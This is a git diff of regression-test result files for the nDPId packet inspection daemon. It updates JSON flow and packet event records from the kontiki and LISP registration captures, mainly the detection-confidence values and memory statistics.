+00645{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3289,"source":"kontiki.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1213662198298,"flow_last_seen":1213662202883,"flow_idle_time":140000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1213662202883,"l3_proto":"ip4","src_ip":"10.25.32.3","dst_ip":"10.25.32.59","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} +00646{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3289,"source":"kontiki.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1213662198289,"flow_last_seen":1213662198289,"flow_idle_time":140000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1213662202883,"l3_proto":"ip4","src_ip":"10.25.249.14","dst_ip":"10.25.32.59","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} 00604{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3289,"source":"kontiki.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1213662195077,"flow_last_seen":1213662195077,"flow_idle_time":200000,"flow_min_l4_payload_len":991,"flow_max_l4_payload_len":991,"flow_tot_l4_payload_len":991,"flow_avg_l4_payload_len":991,"midstream":0,"thread_ts_msec":1213662202883,"l3_proto":"ip4","src_ip":"10.25.32.59","dst_ip":"255.255.255.255","src_port":19948,"dst_port":19948,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3289,"source":"kontiki.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1213662195077,"flow_last_seen":1213662195077,"flow_idle_time":200000,"flow_min_l4_payload_len":991,"flow_max_l4_payload_len":991,"flow_tot_l4_payload_len":991,"flow_avg_l4_payload_len":991,"midstream":0,"thread_ts_msec":1213662202883,"l3_proto":"ip4","src_ip":"10.25.32.59","dst_ip":"255.255.255.255","src_port":19948,"dst_port":19948,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00600{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3289,"source":"kontiki.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1213662198289,"flow_last_seen":1213662198301,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":311,"flow_tot_l4_payload_len":537,"flow_avg_l4_payload_len":179,"midstream":0,"thread_ts_msec":1213662202883,"l3_proto":"ip4","src_ip":"10.25.32.59","dst_ip":"64.200.148.82","src_port":19948,"dst_port":1948,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3289,"source":"kontiki.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1213662198289,"flow_last_seen":1213662198301,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":311,"flow_tot_l4_payload_len":537,"flow_avg_l4_payload_len":179,"midstream":0,"thread_ts_msec":1213662202883,"l3_proto":"ip4","src_ip":"10.25.32.59","dst_ip":"64.200.148.82","src_port":19948,"dst_port":1948,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00808{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3289,"source":"kontiki.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1213662198298,"flow_last_seen":1213662202883,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":20,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":20,"midstream":0,"thread_ts_msec":1213662202883,"l3_proto":"ip4","src_ip":"10.25.32.59","dst_ip":"64.200.148.88","src_port":19948,"dst_port":80,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Kontiki","breed":"Potentially Dangerous","category":"Media"}} +00808{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3289,"source":"kontiki.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1213662198298,"flow_last_seen":1213662202883,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":20,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":20,"midstream":0,"thread_ts_msec":1213662202883,"l3_proto":"ip4","src_ip":"10.25.32.59","dst_ip":"64.200.148.88","src_port":19948,"dst_port":80,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Kontiki","breed":"Potentially Dangerous","category":"Media"}} 00565{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":3289,"source":"kontiki.pcap","alias":"nDPId-test","packets-captured":3289,"packets-processed":3289,"total-skipped-flows":0,"total-l4-payload-len":3716430,"total-not-detected-flows":2,"total-guessed-flows":0,"total-detected-flows":6,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":8,"total-idle-flows":8,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":43,"global_ts_msec":1213662202883} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 3289/3289 @@ -49,9 +49,9 @@ ~~ total active/idle flows...: 8/8 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5972216 bytes -~~ total memory freed........: 5972216 bytes -~~ total allocations/frees...: 121430/121430 +~~ total memory allocated....: 6105850 bytes +~~ total memory freed........: 6105850 bytes +~~ total allocations/frees...: 124192/124192 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 444 chars ~~ json string max len.......: 1778 chars diff --git a/test/results/lisp_registration.pcap.out b/test/results/lisp_registration.pcap.out index ad591662c..5005c6766 100644 --- a/test/results/lisp_registration.pcap.out +++ b/test/results/lisp_registration.pcap.out @@ -2,28 +2,28 @@ 00557{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"lisp_registration.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1597152685554} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"lisp_registration.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1597152685554,"flow_last_seen":1597152685554,"flow_idle_time":200000,"flow_min_l4_payload_len":88,"flow_max_l4_payload_len":88,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":88,"midstream":0,"thread_ts_msec":1597152685554,"l3_proto":"ip4","src_ip":"10.0.123.2","dst_ip":"10.0.123.1","src_port":4342,"dst_port":4342,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00564{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"lisp_registration.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1597152685554,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":130,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":130,"pkt_l4_len":96,"thread_ts_msec":1597152685554,"pkt":"qrvMAAEAqrvMAAIACABFwAB0AJYAAP8RsB8KAHsCCgB7ARD2EPYAYGa4MgABAWerkx+ei5dKAAEAFLdG1odgiOW+z\/RAIKtUGCaiNO0QAAAFoAEgEAAAAAABCgAAAhYWFhYABQABCgB7AtD01FgUttPjIYPJQy5LWPIAAAAAAAAAAA=="} -00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"lisp_registration.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1597152685554,"flow_last_seen":1597152685554,"flow_idle_time":200000,"flow_min_l4_payload_len":88,"flow_max_l4_payload_len":88,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":88,"midstream":0,"thread_ts_msec":1597152685554,"l3_proto":"ip4","src_ip":"10.0.123.2","dst_ip":"10.0.123.1","src_port":4342,"dst_port":4342,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LISP","breed":"Acceptable","category":"Cloud"}} +00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"lisp_registration.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1597152685554,"flow_last_seen":1597152685554,"flow_idle_time":200000,"flow_min_l4_payload_len":88,"flow_max_l4_payload_len":88,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":88,"midstream":0,"thread_ts_msec":1597152685554,"l3_proto":"ip4","src_ip":"10.0.123.2","dst_ip":"10.0.123.1","src_port":4342,"dst_port":4342,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"LISP","breed":"Acceptable","category":"Cloud"}} 00581{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"lisp_registration.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1597152685555,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":142,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":142,"pkt_l4_len":108,"thread_ts_msec":1597152685555,"pkt":"qrvMAAEAqrvMAAIACABFwACAAJcAAP8RsBIKAHsCCgB7ARD2EPYAbMDFMgABAT470dH4ChLaAAEAFJgCmsMIGdOV75RgmwLw3u2YWic1AAAFoAGAEAAAAAAC\/AAAAAAAAAAAAAAAAAAAAhYWFhYABQABCgB7AtD01FgUttPjIYPJQy5LWPIAAAAAAAAAAA=="} 00580{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"lisp_registration.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1597152685555,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":142,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":142,"pkt_l4_len":108,"thread_ts_msec":1597152685555,"pkt":"qrvMAAEAqrvMAAIACABFwACAAJgAAP8RsBEKAHsCCgB7ARD2EPYAbFMcMgABAecEMPyhgJYjAAEAFLR7gLhELdB05V0IZvC04Du3TwxeAAAFoAEaEAAAAEADAAACIAAKAAAAZAABwKhmABYWFhYABQABCgB7AtD01FgUttPjIYPJQy5LWPIAAAAAAAAAAA=="} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9,"source":"lisp_registration.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1597152687289,"flow_last_seen":1597152687289,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1597152687289,"l3_proto":"ip4","src_ip":"10.0.123.2","dst_ip":"10.0.123.1","src_port":15373,"dst_port":4342,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"lisp_registration.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1597152687289,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1597152687289,"pkt":"qrvMAAEAqrvMAAIACABFwAAs6QkAAP8Gx\/4KAHsCCgB7ATwNEPYND3HOAAAAAGACQACCQgAAAgQFtAAA"} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"lisp_registration.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1597152687290,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1597152687290,"pkt":"qrvMAAIAqrvMAAEACABFwAAszvYAAP8G4hEKAHsBCgB7AhD2PA22haFWDQ9xz2ASQAAqVQAAAgQFtAAA"} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"lisp_registration.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1597152687291,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1597152687291,"pkt":"qrvMAAEAqrvMAAIACABFwAAo6QoAAP8GyAEKAHsCCgB7ATwNEPYND3HPtoWhV1AQQABCEgAAAAAAAAAA"} -00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":12,"source":"lisp_registration.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1597152687289,"flow_last_seen":1597152687436,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":15,"flow_tot_l4_payload_len":15,"flow_avg_l4_payload_len":3,"midstream":0,"thread_ts_msec":1597152687436,"l3_proto":"ip4","src_ip":"10.0.123.2","dst_ip":"10.0.123.1","src_port":15373,"dst_port":4342,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"LISP","breed":"Acceptable","category":"Cloud"}} +00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":12,"source":"lisp_registration.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1597152687289,"flow_last_seen":1597152687436,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":15,"flow_tot_l4_payload_len":15,"flow_avg_l4_payload_len":3,"midstream":0,"thread_ts_msec":1597152687436,"l3_proto":"ip4","src_ip":"10.0.123.2","dst_ip":"10.0.123.1","src_port":15373,"dst_port":4342,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"LISP","breed":"Acceptable","category":"Cloud"}} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":16,"source":"lisp_registration.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1597152709936,"flow_last_seen":1597152709936,"flow_idle_time":200000,"flow_min_l4_payload_len":116,"flow_max_l4_payload_len":116,"flow_tot_l4_payload_len":116,"flow_avg_l4_payload_len":116,"midstream":0,"thread_ts_msec":1597152709936,"l3_proto":"ip4","src_ip":"10.0.123.3","dst_ip":"10.0.123.1","src_port":4342,"dst_port":4342,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00601{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"lisp_registration.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1597152709936,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":158,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":158,"pkt_l4_len":124,"thread_ts_msec":1597152709936,"pkt":"qrvMAAEAqrvMAAMACABFwACQAEwAAP8RsEwKAHsDCgB7ARD2EPYAfBP6MgABAnsDNrGOEKjEAAEAFGka+80ImORwcY2JmGWtrFsZgmcCAAAFoAEaEAAAAAABwKhnAP8hISEABQABCgB7AwAABaABIBAAAAAAAQoAAAMhISEhAAUAAQoAewNZ6z+5+pkdP+8AUonJfzt9AAAAAAAAAAA="} -00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":16,"source":"lisp_registration.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1597152709936,"flow_last_seen":1597152709936,"flow_idle_time":200000,"flow_min_l4_payload_len":116,"flow_max_l4_payload_len":116,"flow_tot_l4_payload_len":116,"flow_avg_l4_payload_len":116,"midstream":0,"thread_ts_msec":1597152709936,"l3_proto":"ip4","src_ip":"10.0.123.3","dst_ip":"10.0.123.1","src_port":4342,"dst_port":4342,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LISP","breed":"Acceptable","category":"Cloud"}} +00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":16,"source":"lisp_registration.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1597152709936,"flow_last_seen":1597152709936,"flow_idle_time":200000,"flow_min_l4_payload_len":116,"flow_max_l4_payload_len":116,"flow_tot_l4_payload_len":116,"flow_avg_l4_payload_len":116,"midstream":0,"thread_ts_msec":1597152709936,"l3_proto":"ip4","src_ip":"10.0.123.3","dst_ip":"10.0.123.1","src_port":4342,"dst_port":4342,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"LISP","breed":"Acceptable","category":"Cloud"}} 00634{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"lisp_registration.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1597152709936,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":182,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":182,"pkt_l4_len":148,"thread_ts_msec":1597152709936,"pkt":"qrvMAAEAqrvMAAMACABFwACoAE0AAP8RsDMKAHsDCgB7ARD2EPYAlFlmMgABAqopDMUFFm31AAEAFBocdBgtY+Hz9Ueh9UZxQJ1vv2IjAAAFoAFAEAAAAAAC\/AABkgFoAQMAAAAAAAAAAP8hISEABQABCgB7AwAABaABgBAAAAAAAvwAAAAAAAAAAAAAAAAAAAMhISEhAAUAAQoAewNZ6z+5+pkdP+8AUonJfzt9AAAAAAAAAAA="} 00583{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"lisp_registration.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1597152709936,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":142,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":142,"pkt_l4_len":108,"thread_ts_msec":1597152709936,"pkt":"qrvMAAEAqrvMAAMACABFwACAAE4AAP8RsFoKAHsDCgB7ARD2EPYAbDmBMgABAXFyKntOHooaAAEAFI0ikSo37n3NSMdaLlvkb41n5QfMAAAFoAEaEAAAAEADAAACIAAKAAAAZAABwKhnACEhISEABQABCgB7A1nrP7n6mR0\/7wBSicl\/O30AAAAAAAAAAA=="} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":24,"source":"lisp_registration.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1597152711673,"flow_last_seen":1597152711673,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1597152711673,"l3_proto":"ip4","src_ip":"10.0.123.3","dst_ip":"10.0.123.1","src_port":52995,"dst_port":4342,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"lisp_registration.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1597152711673,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1597152711673,"pkt":"qrvMAAEAqrvMAAMACABFwAAsuMMAAP8G+EMKAHsDCgB7Ac8DEPZkcBpBAAAAAGACQADvdgAAAgQFtAAA"} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":25,"source":"lisp_registration.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1597152711674,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1597152711674,"pkt":"qrvMAAMAqrvMAAEACABFwAAsBk8AAP8GqrgKAHsBCgB7AxD2zwMtqeWdZHAaQmASQADcHgAAAgQFtAAA"} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"lisp_registration.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1597152711674,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1597152711674,"pkt":"qrvMAAEAqrvMAAMACABFwAAouMQAAP8G+EYKAHsDCgB7Ac8DEPZkcBpCLanlnlAQQADz2wAAAAAAAAAA"} -00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":27,"source":"lisp_registration.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1597152711673,"flow_last_seen":1597152711820,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":15,"flow_tot_l4_payload_len":15,"flow_avg_l4_payload_len":3,"midstream":0,"thread_ts_msec":1597152711820,"l3_proto":"ip4","src_ip":"10.0.123.3","dst_ip":"10.0.123.1","src_port":52995,"dst_port":4342,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"LISP","breed":"Acceptable","category":"Cloud"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":30,"source":"lisp_registration.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1597152711673,"flow_last_seen":1597152712034,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":660,"flow_tot_l4_payload_len":1207,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1597152712034,"l3_proto":"ip4","src_ip":"10.0.123.3","dst_ip":"10.0.123.1","src_port":52995,"dst_port":4342,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LISP","breed":"Acceptable","category":"Cloud"}} -00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":30,"source":"lisp_registration.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1597152709936,"flow_last_seen":1597152709943,"flow_idle_time":200000,"flow_min_l4_payload_len":88,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":868,"flow_avg_l4_payload_len":108,"midstream":0,"thread_ts_msec":1597152712034,"l3_proto":"ip4","src_ip":"10.0.123.3","dst_ip":"10.0.123.1","src_port":4342,"dst_port":4342,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LISP","breed":"Acceptable","category":"Cloud"}} -00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":30,"source":"lisp_registration.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1597152685554,"flow_last_seen":1597152685560,"flow_idle_time":200000,"flow_min_l4_payload_len":88,"flow_max_l4_payload_len":112,"flow_tot_l4_payload_len":800,"flow_avg_l4_payload_len":100,"midstream":0,"thread_ts_msec":1597152712034,"l3_proto":"ip4","src_ip":"10.0.123.2","dst_ip":"10.0.123.1","src_port":4342,"dst_port":4342,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LISP","breed":"Acceptable","category":"Cloud"}} -00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":30,"source":"lisp_registration.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1597152687289,"flow_last_seen":1597152687645,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":452,"flow_tot_l4_payload_len":915,"flow_avg_l4_payload_len":130,"midstream":0,"thread_ts_msec":1597152712034,"l3_proto":"ip4","src_ip":"10.0.123.2","dst_ip":"10.0.123.1","src_port":15373,"dst_port":4342,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LISP","breed":"Acceptable","category":"Cloud"}} +00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":27,"source":"lisp_registration.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1597152711673,"flow_last_seen":1597152711820,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":15,"flow_tot_l4_payload_len":15,"flow_avg_l4_payload_len":3,"midstream":0,"thread_ts_msec":1597152711820,"l3_proto":"ip4","src_ip":"10.0.123.3","dst_ip":"10.0.123.1","src_port":52995,"dst_port":4342,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"LISP","breed":"Acceptable","category":"Cloud"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":30,"source":"lisp_registration.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1597152711673,"flow_last_seen":1597152712034,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":660,"flow_tot_l4_payload_len":1207,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1597152712034,"l3_proto":"ip4","src_ip":"10.0.123.3","dst_ip":"10.0.123.1","src_port":52995,"dst_port":4342,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"LISP","breed":"Acceptable","category":"Cloud"}} +00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":30,"source":"lisp_registration.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1597152709936,"flow_last_seen":1597152709943,"flow_idle_time":200000,"flow_min_l4_payload_len":88,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":868,"flow_avg_l4_payload_len":108,"midstream":0,"thread_ts_msec":1597152712034,"l3_proto":"ip4","src_ip":"10.0.123.3","dst_ip":"10.0.123.1","src_port":4342,"dst_port":4342,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"LISP","breed":"Acceptable","category":"Cloud"}} +00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":30,"source":"lisp_registration.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1597152685554,"flow_last_seen":1597152685560,"flow_idle_time":200000,"flow_min_l4_payload_len":88,"flow_max_l4_payload_len":112,"flow_tot_l4_payload_len":800,"flow_avg_l4_payload_len":100,"midstream":0,"thread_ts_msec":1597152712034,"l3_proto":"ip4","src_ip":"10.0.123.2","dst_ip":"10.0.123.1","src_port":4342,"dst_port":4342,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"LISP","breed":"Acceptable","category":"Cloud"}} +00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":30,"source":"lisp_registration.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1597152687289,"flow_last_seen":1597152687645,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":452,"flow_tot_l4_payload_len":915,"flow_avg_l4_payload_len":130,"midstream":0,"thread_ts_msec":1597152712034,"l3_proto":"ip4","src_ip":"10.0.123.2","dst_ip":"10.0.123.1","src_port":15373,"dst_port":4342,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"LISP","breed":"Acceptable","category":"Cloud"}} 